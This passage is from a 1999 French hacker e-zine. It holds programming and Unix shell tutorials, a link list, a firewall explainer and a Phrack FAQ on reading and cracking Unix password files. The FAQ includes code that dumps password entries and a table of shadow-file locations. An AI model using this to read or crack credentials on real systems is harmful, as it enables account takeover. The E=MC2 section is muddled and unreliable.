3D13 - numero 3
TROIS DES TREIZE
3d13@usa.net
ICQ#38328109
------------------------------------------------------------------------------
                           Samedi 10 Juillet 1999
                                  ISSUE #3
------------------------------------------------------------------------------
INTROUDUCTION :
C'est partit pour un numero 3, cette fois, il est big, vous en aurez pour
votre argent (pour le telechargement :-)
Nous allons aborder plein de sujets, toujours creatifs, nous sommes prets a
vous reveler quelques "secrets" sur des failles reseau.
Aussi, Clad Strafe, un hacker qui a fait quelques trucs interessants m'a envoye
quelque uns de ses articles pratiques qui sont deja parus dans 2020hack, je
les ai donc judicieusement places pour ce numero, c'est vrai que cela peut
donner l'impression de deja vu, mais bon, c'est tellement utile que si vous
connaissez pas ces techniques sur le bout des doigts, vous aurez du mal a
progresser car il s'agit de la base.
Si vous n'avez pas 3D13_01 ou 02, telechargez le a l'adresse www.madchat.org
ou http://cybz.virtualave.net 
Enfin, ce numero n'est pas le dernier, loin de la, mais comme je suis en train
d'ecrire un hacker handbook et un unix handbook, j'ai pas mal de boulot, donc
le prochain, si vous voulez qu'il sorte plus rapidement, ecrivez des articles
car j'aurais pas le temps de le faire, tant que vos texte sont pas lame, c'est
bon.
JE RECHERCHE ACTIVEMENT DES PHREAKERS ET DES CHIMISTES

DISCLAMER :
Depuis que j'ai engage d'autres auteurs, je me doit d'en faire un...
Tout ce que vous lisez n'a qu'un but : celui de l'information, juste pour
votre culture, ne le faites pas, c'est pas bien de le faire et vous serez
puni au coin (a l'ombre :-( ), donc, tout ce que je raconte en dessous, c'est
parce que j'invente des trucs, et il parait que ca marche, mais je n'ais
jamais essaye, je vous dis des trucs, qui peuvent marcher, je vous raconte
des bobards et n'y croyez pas car c'est pas vrai du tout et ca marche pas.
donc, ce qu'il faut retenir dans ce baratin : ce magazine est hors-la-loi
uniquement si il est lu, alors le lisez pas. J'ecrit ce zine car je veux
laisser une trace de moi dans 1000 ans (meme une toute petite) et jamais je
ne fait ou n'utilise pas ce que je dit, je suis un menteur et les autres auteurs
sont aussi des menteurs et faut pas nous punir si ce que l'on dit marche, mais
on savait pas... (quoi que... il parait que nul n'est cense ignorer la loi...)
Mon url sera bientot disponible, vous pourrez trouver un compilateur pascal
fonctionnant sous dos (turbo pascal 7) pour ceux qui me l'ont demande, en
attendant, vous pouvez trouver deux compilateurs sur www.linuxapps.com.

A TOUS LES NEUNEUS :
Ceux qui recoivent un mail de moi, et qui se disent : "Tiens, pourquoi il y a
ecrit "FROM : Lucie Fabien (3d13@usa.net)" !!", eh ben NON NON NON ET NON,
c'est pas comme ca que je m'appelle, mais ca fait au moins parler les curieux

------------------------------------------------------------------------------
Les definitions du jour :
ANARCHISTE = Partisant de l'anarchisme
ANARCHISME = Doctrine politique qui preconise la suppression de l'Etat et de
             toute contrainte sociale sur l'individu
ANARCHIE   = 1. Anarchisme.
             2. Etat de trouble, de desordre du a l'absence d'autorite
             politique, a la carence des lois.
             3. Etat de confusion generale
source : mon petit larousse
------------------------------------------------------------------------------
                                  SOMMAIRE

             ø--------------------------------|----------------ø
             |            ARTICLE             |     AUTEUR     |
             ø--------------------------------|----------------ø
 1...........| Votre courrier                 |      VOUS      |
 2...........| Turbo Pascal (partie 3)        |      3D13      |
 3...........| Initiation au C++              |     Lefty      |
 4...........| Les bonnes planques du WEB     |      3D13      |
 5...........| Unix, le shell                 |      3D13      |
 6...........| /etc/passwd                    |phrack magazine |
 7...........| Explication rapide de E=MC2    |      3D13      |
 8...........| Les proxys et les fire-walls   |  Clad Strife   |  
 9...........| Organisez vos reunions de hack |      3D13      |
 10..........| Cracker son password BIOS par  |                |
             | MS-DOS                         |  Clad Strife   |
 11..........| Le FTP sous MS-DOS             |  Clad Strife   |
 12..........| Anarchie                       |      3D13      |
 13..........| Ecrivez-vous en LAN            |      3D13      |
 14..........| Montez votre PC                |      3D13      |
 15..........| Un exemple pratique            |  Clad Strife   |
             |                                |    & 3D13      |
 16..........| Faille Windows                 |      3D13      |
 17..........| Hackez des routeurs par telnet |  Clad Strife   |
 18..........| Envoyez des mails anonymes par |                |
             | telnet                         |  Clad Strife   |
 19..........| Le scan du moment              |      3D13      |
 20..........| Mail-boom:soyez intelligent    |      3D13      |
 21..........| LINUX:Pratique (partie 1)      |      3D13      |
 22..........| Liste des livres interressants | Hitchy & 3D13  | 
 23..........| Prenez les commandes d'un      |                |
             | supermarche                    |     Hitchy     |
 24..........| LINUX:Pourquoi il l'installer? |      3D13      |
 25..........| Le mot 2 la faim               |      3D13      |      
             ø--------------------------------|----------------ø

LES AUTEURS :
 3D13        = 3d13@usa.net
               www.jesaitpasencorequelleurljevaisavoiretsijefaitunsite.gov

 Hitchy      = hitchy89@hotmail.com
               www.ilenapasmaispeutetreilenauraunedurl.com 

 Clad Strife = clad_strife@hotmail.com
               www.ilenauraunebientotalorsjevousladonneraislorsduprochainumero

 Lefty       = ecrivez moi et je lui transmettrais vos e-mails, mettez bien
               alors dans le Subject : "Lefty" et il vous repondra.


------------------------------------------------------------------------------
*1************************** Votre courrier **********************************
--------------------------------| VOUS |--------------------------------------

N 1 :

Salut,  
J'ai eu cette semaine ton mag entre les doigts. C'est pas mal du  
tout encore un peu brumeux pour un newbie comme moi mais bon  
je m'y attele... Arf...  
Sinon un commentaire si tu me permet...(t'en fait ce ke tu veux)  
- Surtout, reste aussi clair que tu es... Ne complique pas. Tu es  
très bien comme ca.  
- D'autre part (je ne sais pas si tu vas bien le prendre...Hic !...) évite  
le plus possible les fotes d'ortograf.  
- Ensuite. Peut-on s'abonner ? Et comment ? Envoi sur E-mail ?  
Ou il faut aller kelke part ?  
- Pour finir. Je ne sais pas si je vais pas dire une grosse bétise  
mais bon je me lance... Ce seras intéressant si tu avais un  
rubrique pour Vendre/Acheter/Echanger des progs et SURTOUT du  
matos car c'est difficile de progresser sans matériels puissants !!!  
>
REPONSE :
Merci, ca fait plaisir de savoir qu'on est lu, je vais repondre un a un a tous
tes commentaires :
- Je penses etre clair dans mon texte car beaucoup de personnes m'on fait la
remarque, je vais tout faire pour le rester mais comme maintenant je ne suis
plus le seul auteur de cet e-zine, tous les articles ne seront pas forcement
faits par moi, je ne serais plus maitre de leur clarte, plaignez vous aupres
de l'auteur lui meme si vous etes pas content.
Pour ce qui est des fotes d'ortograf, j'evite d'en faire mais... je suis pas
un professeur de lettres appliquees donc, j'en fait toujours quelques unes,
mais si tu veux, tu peux les corriger pour toi, pour ton propre plaisir.
- Tu peux t'abonner, envoie moi ton adresse postale, ton numero de telephone,
ton adresse IP fixe et tu recevra, pour toi et chez toi, quelques V..iperes,
en fait, cet e-zine est distribue (pour l'instant) sur les deux adresses :
www.madchat.org ou cybz.virtualave.net, si tu as un site, tu peux placer mon
e-zine dans une de tes rubriques, et dis moi le nom de ton site, pour que je
puisse aller y faire un tour et peux etre placer un lien de ma page(en
construction) vers ta page.
- Bien sur, je vais tout de suite faire cette rubrique : avis a tous les
lecteurs, envoyez moi toutes vos coordonnees et l'objet que vous recherchez et
voulez vendre, et faites vous pieger par les V. non, soyons serieux, on peux
pas faire de l'echange/achat/vente dans cet e-zine, il existe les puces
informatiques, tres complet, 10 F chez votre marchand de journaux.

N 2 :

Salut,  
 J'aimerrais que tu me donne l'adresse de ton site pour  
que je puisse telecharger le progamme de programmation  
"Pascal Turbo".  
Tes articles sont tres bien faits.  
A+  
>
REPONSE :
Je n'ai pas encore de site, ca arrive, lentement mais ca arrive, car je
prefere pour l'instant faire place au redactionnel, je suis en train d'ecrire
un Unix Handbook, en francais et un Hacker handbook, reserve aux personnes qui
savent pas par ou commencer, et quelques exemples pratiques, j'essayerais de
rester clair et complet. Je fait beaucoup de trucs en ce moment, mais mon site
sera mis en place avant Septembre...patience.
Are u English? 'cause it's not "Pascal Turbo" but "Turbo Pascal".
tu trouveras le compilateur sur mon site quand je l'aurais fait.
So, wait a moment...

------------------------------------------------------------------------------
*2*********************** Turbo Pascal (partie 3) ****************************
----------------------------------| 3D13 |------------------------------------

Tous les cours qui ont precedes ne vous ont pas vraiment expliquer la syntaxe,
nature du langage parce que l'on peut trouver toutes ces informations dans des
bouquins, mais, comme il s'agit du langage Pascal, plus trop de livres lui
sont consacre alors je vais attaquer ici la partie theorique du langage, qui
est tout de meme assez longue puis, dans le prochain numero, la partie plus
pratique avec entre autre la programmation de graphiques, nous verrons apres
la programmation d'un petit jeu sans pretention, si vous avez des idees la
dessus, envoyez moi un e-mail.

1°) MOTS RESERVES :
Les mots reserves ne peuvent pas etre redefinis.
Ils ne font pas la difference minuscules/majuscules.
Voici la liste des mots reserves:
absolute		and		array		asm
assembler		begin		case		const
constructor		destructor	div		do
downto			else		end		export
exports			external	file		far
for			forward		function	goto
if			implementation  in		index
inherited		inline		interface	interrupt
label			library		mod		name
near			nil		not		object
of			or		packed		private
procedure		program		public		record
repeat			resident	set		shl
shr			string		then		to
type			unit		until		uses
var			virtual		while		with
xor

2°) LES COMMENTAIRES :
Ce sont des informations, annotions, textes qui sont igonres par le
compilateur et premettent simplement de renseigner le programmeur.
Les commentaires sont mis entre accolades { et }, ou entre parentheses et
asterisques (* et *). On ne doit pas melanger les deux symboles, { *) est
interdit.
exemples :
		{ il est beau mon commantaire }
		(* non, celui ci il est plus beau que l'autre *)

il existe aussi, les directives de compilation, qu'il ne faut pas confondre
avec les commentaires, leur signe distinctif est qu'elles comencent par $, par
exemple, {$I-} est une directive de compilation que nous verrons forcement au
cours des numeros, qui permet d'indiquer au compilateur d'ignorer les erreurs.

3°) LES IDENTIFICATEURS :
Comme un exemple vaut mieux qu'un long discours, voici :
	a. identificateurs corrects
  lire_papier
  ABasLesV
  Henri
  Martin_Duval
  Un_2_3
	b. identificateurs incorrects 
  1_Appel    { commence par un chiffre }
  Jean-Marc  { tiret interdit }
    aussi, toutes les lettres accentuees sont interdites et n'utilisez pas les
mots reserves au pascal, si besoin est, consultez la liste dessus.

4°) LES CONSTANTES
Il s'agit d'element qui ne chagerons jamais au cours de votre programme, vous
ferez appel a ces constantes et si vous avez besoin de les modifier, vous les
modifierez qu'a un endroit dans tout votre programme, par exemple, deux
constantes connues :
  Pi   : 3.14
  Euro : 6.52
c'est sur que Pi, on auras jamais besoin de le changer, mais Euro, si la
valeur de l'Euro change, il faudra juste modifier cet endroit et tout le
programme sera change quand on fera appel a cette valeur.
Les constantes sont declares au tout debut du programme, vous pouvez regarder
le schema du corps d'un programme pascal dans la partie juste en dessous de
celle-ci, le 5°).
je vais vous donner en exemple, un petit programme qui vous affichera votre
constante :
  PROGRAM Constantes;
  { (C) 3d13 1999 }
  CONST Euro=6.52;
  VAR Francs : Integer;
  BEGIN
    WriteLn('Entrez la somme en F a convertir en E :');
    ReadLn(Francs);
    Writeln('Cela fait ',Francs div Euro,' Euros');
  END.

C'est tout pour aujourd'hui, la suite au prochain numero, on continue pour le
prochain la fin de la theorie et apres, la pratique.
Pour terminer je voudrais vous dire de bien connaitre tout ceci car c'est le
B.A.BA du language, on a encore rien vu.
Ah, un truc je j'ai failli oublier de vous dire : si vous souhaitez ecrire le
mot "aujourd'hui", ecrivez WriteLn('aujourd''hui');.
------------------------------------------------------------------------------
*3************************** Initiation au C++ *******************************
---------------------------------| Lefty |------------------------------------

Je n'ai ici la pretention que de vous enseigner la base, celle qui vous
permettra, avec un peu d'implication personnelle, de vous faire parvenir a des
resultats tres satisfaisants. Les chapitres developpes seront : 
	-ORGANISATION D'UN PROGRAMME SIMPLE 	
	-FONCTION, APPEL DE FONCTION 

ORGANISATION D'UN PROGRAMME SIMPLE
Un programme, c'est evident, manipule des données. Voici les principaux types
de donnée : 	
	-int   : nombres entiers compris entre -32768 et 32767
	-float : nombre à virgule
	-void  : valeur d'aucun type
	-char  : caractere (lettre,...)
	-enum  : enumeration (exemple enum jour(lundi,mardi,mercredi) la
valeur initiale par defaut est zero, celles qui suivent augmentent de 1)

Remarque : pour les types int et float, on peut faire preceder "long", qui
augmente l'intervalle des valeur. De plus, il faut toujours commencer ses
programmes par un ou plusieurs fichiers d'en-tete, qui vous permettront de
lire certaines instructions. Le fichier d'en-tete de base est <iostream.h> 
(.h ou .hpp sont les extensions caracteristiques des fichiers d'en-tete). Tout
programme commencera donc par : #include <iostream.h> Le programme doit aussi
contenir une fonction principale, la fonction "main". Mais qu'est ce qu'une
fonction ? C'est une declaration, en l'occurrence main( ) ou void main( )
suivi d'un bloc contenant une suite d'instruction (un ; devant succeder a
chaque instruction). Tout le programme s'organise autour de la fonction main.
Les déclarations sont de cette forme : type nom (parametres). Le type est le
type de valeur renvoye par la fonction, un des types vu plus haut. Le type par
defaut est int. Le nom, c'est vous qui l'attribuez, sauf dans le cas de la
fonction principale qui s'appellera toujours main. Les parametres sont les
valeurs qui seront transmises a la fonction, leur type doit etre preciser. La
fonction main ne recoit jamais aucun parametre. 
Voila donc un programme simple :  
#include <iostream.h> 
main( )
{cout<<"bonjour tout le monde"; 
return 0;} 
On a commence par inclure le fichier d'en-tete, puis par declarer la fonction
principale. Aucun type n'ayant ete precise, elle est de type int. Voila
pourquoi elle renvoie 0, une valeur de type int par l'instruction return 0.
L'instruction cout<< permet d'afficher un resultat, ou des caracteres, c'est
un operateur de sortie. L'operateur d'entree est cin>>  exemple: cin>>A on
attribuera la valeur entree par l'utilisateur a A. Il faudra absolument
veiller a ce que le type de la valeur qui sera entrée sera compatible avec le
type de A, sinon, ca va tout faire foirer. Il aurait aussi fallu declarer A
auparavant, par une instruction du genre : int a ;  sous peine de voire
apparaitre un message d'erreur lors de la compilation.

FONCTION, APPEL DE FONCTION
se limiter à la fonction main va un moment, pas plus. Le besoin d'en creer
d'autres, pour se décharger un petit peu, se fait vite ressentir. Si vous en
utilisez d'autres, vous devez en prevenir le compilateur au début, juste apres
l'inclusion du fichier d'en-tete, de cette façon : type nom (parametres) ; Par
exemple, si vous creez une fonction addition qui additionnera deux nombres,
vous devrez indiquer au debut : int addition (int, int) ;  Plus tard dans le
programme, vous creerez la fonctionne elle-meme, qui sera : int addition (int
a, int b) {int addition=a+b; return addition;} Mais voyons ca par la pratique,
par une petite application qui additionnerait deux nombres par un appel de
fonction :  
#include <iostream.h> 
int addition (int, int) ;
void main( )
{int a,b,c ;
cout<<"entrez un nombre"<<'\n' ;
cin>>a ;
cout<<"entrez un deuxième nombre"<<'\n' ;
cin>>b ;
c=addition(a, b);
cout<<"la somme des deux vaut : "<<c;
return ;}

 int addition (int x, int y)
{int addition =x+y ;
return addition ;}

Ce programme est relativement simple : on déclare trois parametres de type int
a la suite, on attribue une valeur aux deux premier, le troisieme est leur
somme, puis on en affiche le resultat. deux choses sont remarquables dans ce
programme : 	
-le type de la fonction main, et donc de la valeur qu'elle renvoie. On peut
remarquer qu'elle ne retourne rien comme valeur, voila donc un apercu de ce
que peut etre le type void. 	
-l'appel a la fonction addition dans la fonction main par l'instruction
c=addition(a, b) ; on transmettra donc les valeur a et b pour les valeurs x et
y dans la fonction addition qui les additionnera puis en retournera le
resultat, qui sera attribue a c. Voila ce qu'est un appel de fonction.
En prevision pour 3d13#4 :
	-NOTIONS DE BASE SUR LES POINTEURS ET LES ALIAS 	
	-NOTIONS DE BASE SUR LES CLASSES

------------------------------------------------------------------------------
*4********************** Les bonnes planques du web **************************
----------------------------------| 3D13 |------------------------------------

Voici une liste d'adresses que j'avais note sur un bout de papier que j'ai
rassemble ici, pour vous bande de veinards :

www.genocide2600.com/~tattooman
> Un mine d'informations qui seront aussi utiles pour l'administrateur que
pour le cracker.

www.kde.org
> Suivez le developpement en cours de KDE, une interface pour Linux

www.cyberpapy.com
> Discutez en live-chat avec des vieux, mais parfois il y a des jeunes

www.kevinmitnick.com
> Pour avoir plein d'information sur cette legende qu'est le Condor

www.ardi.com
> Mac OS 6.07, tenant sur deux disks, pour windows, il s'agit du programme
Executor.

www.multimania.com/cd13h
> Le scan des numeros 08009xxxxx

01 40 57 57 57 ou 01 40 57 66 34
> Demandez a parler a Bernard Condat, bienvenue chez les V! (D.S.T.)

www.audiogalaxy.com
> Un site de recherche mp3, mieux de mp3.box.sk

www.insecure.org/nmap
> telechargez nmap

www.confine.com
> Site de hackers

www.aful.org
> Association Franaise des utilisateurs de logiciels libres

(http://)rufus.w3.org/linux/RPM
> Pour trouver des softs en RPM

------------------------------------------------------------------------------
*5*************************** Unix, le shell *********************************
----------------------------------| 3D13 |------------------------------------

Il existe plusieurs shells sous Unix/Linux, choisissez le votre mais celui par
defaut est bash (Bourne Again SHell) donc, je part du principe que vous etes
sous celui-ci.
Le shell a toutes les caracteristiques d'un langage moderne de programmation.
Les commandes pourront etre regroupees sous forme de scripts et elle pouront
faire appel a : 
- des variables
- des operations (modification des contenus de variables)
- des controles de structure (tests decisionnels et boucles)
Pour ceux qui viennent du monde de M$-DOS, imaginez donc que cette rubrique
aurait pu s'appeller "les fichiers batch sous MS-DOS", mais comme on est sous
Unix et que il y a un shell que l'on programme comme un fichier batch, j'ai
preferer l'appeller comme ca. Ne comparez pas les fichiers batch avec la
programmation du shell sous unix, cela reviendrait a comparer le langage basic
avec le c++.
Il y a plusieurs types de variables acceptees :
- Variables definies par l'utilisateur
- Variables predefinies par le systeme
- Variables speciales
Pour ce qui est des sorties, utilisez la commande echo et pour les lectures,
utilisez la commande read.
Au sein de groupe des controles de structure, distinction est faite entre les
decisions et les boucles. En ce qui concerne les decisions, il s'agit plus
particulierement :
- des decisions simples fondees sur if
- des decisions multiples fondees sur case
Les premieres lignes de tout script devraient mentionner le nom du programmeur
ainsi que le role de ce script. Sinon, vous oublierez tres rapidement le but
poursuivi au moment de la creation de ce script.

exemple :
[root@localhost /]# cat Exemple1
# Il est possible de placer des commentaires dans les scripts
# Les lignes de commentaires commencent par le signe #
# Tout ce qui suit le signe # sera ignore par le shell
# Un signe # peut aussi etre place en milieu de ligne
pwd # Ou sommes nous ?
who # Qui est encore la ?
ls # Que se passe t-il ?
# Fin du script
[root@localhost /]#

Si vous voulez ecrire du texte a l'ecran, il faudra utiliser une commande de
sortie, il s'agit de : echo
Il est possible d'inserer des caracteres sspeciaux au sein de votre texte :
|-------------------|-------------------------------------------------------|
| Caractere special | Effet                                                 |
|-------------------|-------------------------------------------------------|
| \n                | Saut de ligne                                         |
| \b                | Retour arriere                                        |
| \t                | Marque de tabulation                                  |
| \c                | Fin de la sortie et annulation du saut de ligne       |
| \\                | Place le caractere \ au sein de votre texte           |
| \0n               | Indication d'un nombre en base 8 sur une, deux ou     |
|                   | trois positions, pour sortie de caracteres speciaux   |
|-------------------|-------------------------------------------------------|
Pour eviter que le shell n'interprete le backslash et permette a la commande
echo de le traiter, vous placerez les parametres entre guillemets. La commande
  echo "Tomates|nCornichons"
affiche le texte "Tomates" dans la premiere ligne et le texte "Cornichons"
dans la ligne suivante. La sortie se termine par un saut de ligne et le prompt
reaparrait sur la troisieme ligne.
  echo "Saisie:\c"
cette commande affiche le texte "Saisie:". Le shell presente son prompt
directement derriere le texte "Saisie:", car le saut de ligne a ete annule par
le parametre \c.
A l'aide de nombres de base 8, vous pourrez placer divers caracteres speciaux
dans les parametres. Ainsi, dans la commande suivante, le texte et maintenant
un bip sera affiche et suivi d'un bip sonore :
  echo "et maintenant un bip\007"
La commande echo est egalement utilisee en collaboration avec des variables du
shell. Le prochain paragraphe vous en apprendra plus sur le sujet.

Les shell vous offre la possibilite de travailler avec des variables. Aussi,
repecter la regle des identificateurs, enoncee dans mla troisieme partie dans
l'apprentissage de turbo pascal.
Souvenez vous, il existe trois types de variables :
- Variables definies par l'utilisateur
- Variables predefinies par le systeme
- Variables speciales
Les deux premiers types de variables sont tres facilement modifiables quant a
leur contenu. Par contre, vous ne pourrez acceder au dernier type, les
variables speciales qu'en lecture.
	* Les variables definies par l'utilisateur
Relisez bien la regle des identificateurs pour le langage Turbo Pascal citee
au-dessus.
Pour declarer une variable, on lui affecte une valeur :
  a=Tomates
Bien sur, la variable est a. Mais n'oubliez pas que lorsque vous ferez appel a
celle-ci, repectez les minuscules/majuscules car a est different de A.
Pour acceder au contenu des variables du shell, vous placerez devant le nom de
la variables le signe $, par exemple :
  [root@localhost /]# $PATH
et vous verrez la liste des repertoires incrits pour l'acces direct au path.
exemples :

[root@localhost /]# a=/u/hugo
[root@localhost /]# cd /
[root@localhost /]# pwd
/
[root@localhost /]# ls $a
/u/hugo/Adresses
/u/hugo/Legume
/u/hugo/Legume2
/u/hugo/Mon_second
/u/hugo/abraham
/u/hugo/bebraham
/u/hugo/jacques
/u/hugo/mon_premier
/u/hugo/zebraham
[root@localhost /]# cd $a
[root@localhost /]# pwd
/u/hugo
[root@localhost /]# echo La variable contient $a
La variable contient /u/hugo
[root@localhost /]# cd /tmp
[root@localhost /]# cd $a/mon_premier
[root@localhost /]# pwd
/u/hugo/mon_premier
[root@localhost /]#

aussi, l'espace est prit comme un caractere special, voici 3 fois la meme
chose sous des formes differentes :
a="Voici de belles tomates"
a='Voici de belles tomates'
a=Voici\ de\ belles\ tomates

Maintenant, supposons qu'il existe une variable contenant la chaine de
caracteres "Tomates", on pourrait ecrire :
[root@localhost /]# b="Ce sont des $a vertes"
[root@localhost /]# echo $b
Ce sont des Tomates vertes

Pour les deux signes de verouillage " et ', il est a noter qu'ils se
verouillent mutuellement. Dans un texte place entre des guillemets, vous
pourrez utiliser librement les apostrophes et inversement :
c="C'est ainsi"
d='dit-il: "et le reste n'est que foutaise..."'

Pour supprimmer un variable, utilisez la commande unset, par exemple, pour
supprimmer toutes les variables precentes, tapez :
[root@localhost /]# unset a
[root@localhost /]# unset b
[root@localhost /]# unset c
[root@localhost /]# unset d

Pour proteger vos variables en ecriture, utilisez la commande readonly
[root@localhost /]# a="Vive le camembert!"
[root@localhost /]# readonly a
[root@localhost /]# unset a
a: is read only

maintenant, tapez, en ligne de commande ceci :
[root@localhost /]# a="suite"
[root@localhost /]# b="c'est tout "
[root@localhost /]# c="aujourdh'ui, "
[root@localhost /]# d="la prochaine"
[root@localhost /]# e="pour "
[root@localhost /]# f="a "
[root@localhost /]# echo $b$e$c$f$d

------------------------------------------------------------------------------
*6**************************** /etc/passwd ***********************************
----------------------------| phrack magazine |-------------------------------

Il s'agit d'une F.A.Q. tiree d'un phrack magazine, j'ai fait simplement la
traduction, mais cela permet de bien degager le flou qui peut trainer autour
de ce mysterieux fichier...

01. Comment puis-je avoir acces au fichier de mot de passe sous Unix ?

Dans n'importe quel version standard d'Unix, le fichier de mot de passe est
/etc/passwd.  Sur d'autres systemes Unix ou dans le cas d'un password
shadowing, le fichier de mot de passe (password file, c'est plus court) peut se
trouver ailleurs.

02. Comment puis-je cracker des mots de passe Unix ?

Contrairement a ce que beaucoup de monde croit, les mots de passe Unix ne
peuvent pas etre decryptes. Les mots de passe Unix sont encryptes avec Un
seul type de fonction.  Le programme de login encrypte le texte que vous tapez
au prompt de "password:" et le compare avec la chaine de caractere encryptee
dans le fichier de mot de passe.

Un crackeur de mots de passes Unix utilise une liste de mots. Chaque mot de 
la liste de mots est ecrypte et les resultats sont compares avec fichier de mot
de passe cible.

Le meilleur crackeur de mots de passes Unix est pour l'instant Crack d'Alec
Muffett.  Pour les PC-DOS, le meilleur produit du moment est CrackerJack.


03. Qu'es-ce que le password shadowing?

Le password shadowing est un system de securite ou le mot de passe encrypte de
/etc/passwd est replace avec une indication speciale et le mot de passe
encrypte est place dans dans endroit separe qui n'est pas lisible avec un
system normal d'utilisateurs.

Pour trouver un password shadowing sur beaucoup (mais pas tous) de systemes,
ecrivez un programme qui utilise successivement des appels a getpwent() pour
obtenir le fichier de mots de passes.

Exemple:

#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}


04. Ou puis-je trouver le fichier de mot de passe quand il est shadowed ?

Unix                  Path                            Indication
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
       or             /tcb/auth/files/<first letter   #
                            of username>/<username>
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files/<first letter   *
                            of username>/<username>
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                      <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *


------------------------------------------------------------------------------
*7******************** Explication rapide de E=MC2 ***************************
----------------------------------| 3D13 |------------------------------------

Rapide, --->
E=Energie
M=Masse
C=Celerite, vitesse de la lumiere
E=M*(C*C)
En gros, cela veut dire que plus il y en a et plus il y en a.
Mais par exemple, si un camion roule a une certainne vitesse et que un autre
camion arrive et lui rentre dedans, plus les camions vont vite et plus il y a
des degats.
C'est utilise pour la physique nucleaire, E=MC² est une formule qui a ete
trouvee par Albert Einsteing, pour la bombe nucleaire.
Elle est utilisee pour expliquer les reactions en chaine.
<--- C'etait rapide

------------------------------------------------------------------------------
*8********************* Les proxys et les fire-walls *************************
-------------------------------| Clad Strife |--------------------------------

Proxys: Le serveur proxy est un moyen comme un autre de connecter tout un 
réseau à travers une seule adresse IP. De plus un proxy est un moyen de
securité assez puissant, vu que un serveur proxy peut autoriser une connexion
internet vers "l'exterieur" pour le reseau mais peut interdire une connexion
"exterieure" via le proxy vers le réseau. Un proxy mets aussi en place ce que
l'on appelle une mise en cache des pages visitées, ce qui revient à dire qu'en
retournant sur la page visitee, la mise en cache s'execute et vous voyez la
page de la mise en cache. Ainsi il n'y a aucun temps de chargement. Le
probleme reste le même avec ce systeme: quand on veut voir la nouvelle version
d'un page web, la mise en cache s'executera et on verra l'ancienne. Il ne
restera alors qu'a reload la page. Ainsi en implementant d'autres produits
pour la securite le proxy peut alors devenir un "firewall" a part entiere.
Point de vue connexion on comprend bien que le proxy a 2 ou plus de cartes
reseaux pour pouvoir joindre le réseau exterieur et le réseau interieur. Tout
ceci pour se securiser contre les intrusions LAN. Sur certains proxys la seule
IP visible sera ladresse IP du proxy lorsque le routage d'IP ne sera pas
active (vous pouvez voir ca en cliquant sur Démarrer/Exécuter/winipcfg/plus
d'infos/ en haut il y a coché ou non routage d'IP active, avec d'autres infos
comme WINS proxy activé etc...). De plus nombreux proxys filtrent les packets
(tels des firewalls), de sorte que la machine recevant les trames recoive
aussi une demande de bloquage ou d'autorisation lors de la reception du packet
de donnees.   Un reseau interne est compose de multitudes de paires
d'addresses IP: le Local Address Table - LAT. Le LAT est cree lors de
l'installation du proxy pour définir les adresses internes. Prenons l'exemple
concret de Microsoft: les serveurs proxy Microsoft utilisent la table de
routage de windows NT pour autocreer le LAT, ce qui a pour effet de produire
des erreurs. Information  interessante quand on sait que les paquets IP routes
via ce chemin ne seront pas soumis aux regles. Ce qui inclut donc que les sous
reseaux peuvent etre dans le meme cas. Par ailleurs nous pouvons supposer
qu'en editant le fichier msplat.txt qui est dans le dossier \Mspclnt de la
machine proxy, nous pourrons voir le LAT. Seuls les utilisateurs du réseau
interne peuvent y établir une connection et ainsi modifier la LAT. 


 Firewalls (with the help of Tobozo):Un firewall permet de renforcer le 
dispositif de securite mis en place sur un systeme à l'aide de plusieurs
options selectionnees par le niveau de securite selon la sensibilitee des
donnees a proteger. Donc en realite un firewall fait une selection des donnees
a recevoir. Cette selection s'appelle filtrage. Le filtrage permet de
determiner l'acceptation de receptions des trames dont le systeme utilisant le
firewall devrait bénéficier. Il est conçu aussi pour empecher l'intrusion
d'une machine "ennemie" sur la machine "amie". Donc les options du firewall
permettent au firewall de savoir ce qu'il va devoir filtrer. Ces options sont
les Regles de Controle d'Acces (Acces Control Policy). Les firewalls de type
reseau operent au niveau des paquets IP. Ils possedent en general deux
interfaces (cartes réseau), une vers le réseau "ami" et l'autre vers le 
réseau "ennemi". Le filtrage s'etablit par examination et comparaison des
paquets sur la tabledes Regles de Controle d'Acces. Ces firewalls sont
capables de filtrer un trafic composé de n'importe quelle combinaison d'IP
source et destination, type de paquet ou assignement de port TCP. Normalement
spécialisés comme des routeurs d'IP, ils sont rapides et efficaces et
transparents a toute opération réseau. Les firewalls d'aujourd'hui deviennent
de plus en plus complexes. Ils peuvent conserver des informations sur les
statistiques des paquets qui les traversent, y compris certaines données. Les
exemples qui sont decrits plus bas sont ceux de :  
-Bastion Host  
-Screened Host  
-Screened Subnet 


Bastion Host Firewall

Communement rencontre sur les reseaux, le terme bastion refere a la structure 
d'un vieux chateau, principalement pour la notion du pont-levis. C'est un
ordinateur avec au moins deux interfaces (cartes réseau), une vers le reseau
"ami" et l'autre vers le réseau "ennemi". Quand le premier acces réseau est
autorise depuis l'interieur vers la partie "ennemi" par le Bastion Host, tous
les autres acces le sont également. Physiquement, les Bastion Host se place
entre l'interieur et l'exterieur du reseau, sans autre intervenant. Ils sont
normalement utilises comme une partie d'un autre firewall -plus grand et plus
sophistique-.  Les desavantages : Une fois qu'un intrus a les droits d'acces,
il a un acces direct a la totalité du  reseau. Ce type de protection n'est pas
assez sophistique pour les applications reseau. 


Screened Host Firewall

Deja plus pousse au niveau technique, ce firewall utilise un routeur intégré 
avec au moins deux interfaces (cartes réseau), une vers le réseau "ami" et
l'autre vers  un Bastion Host. Le routeur intégré sert d'intermediaire avec
Bastion Host. Ainsi  les paquets sont routes apres avoir ete filtres selon des
regles predefinies. Ces  regles peuvent decider quelles adresses IP sont
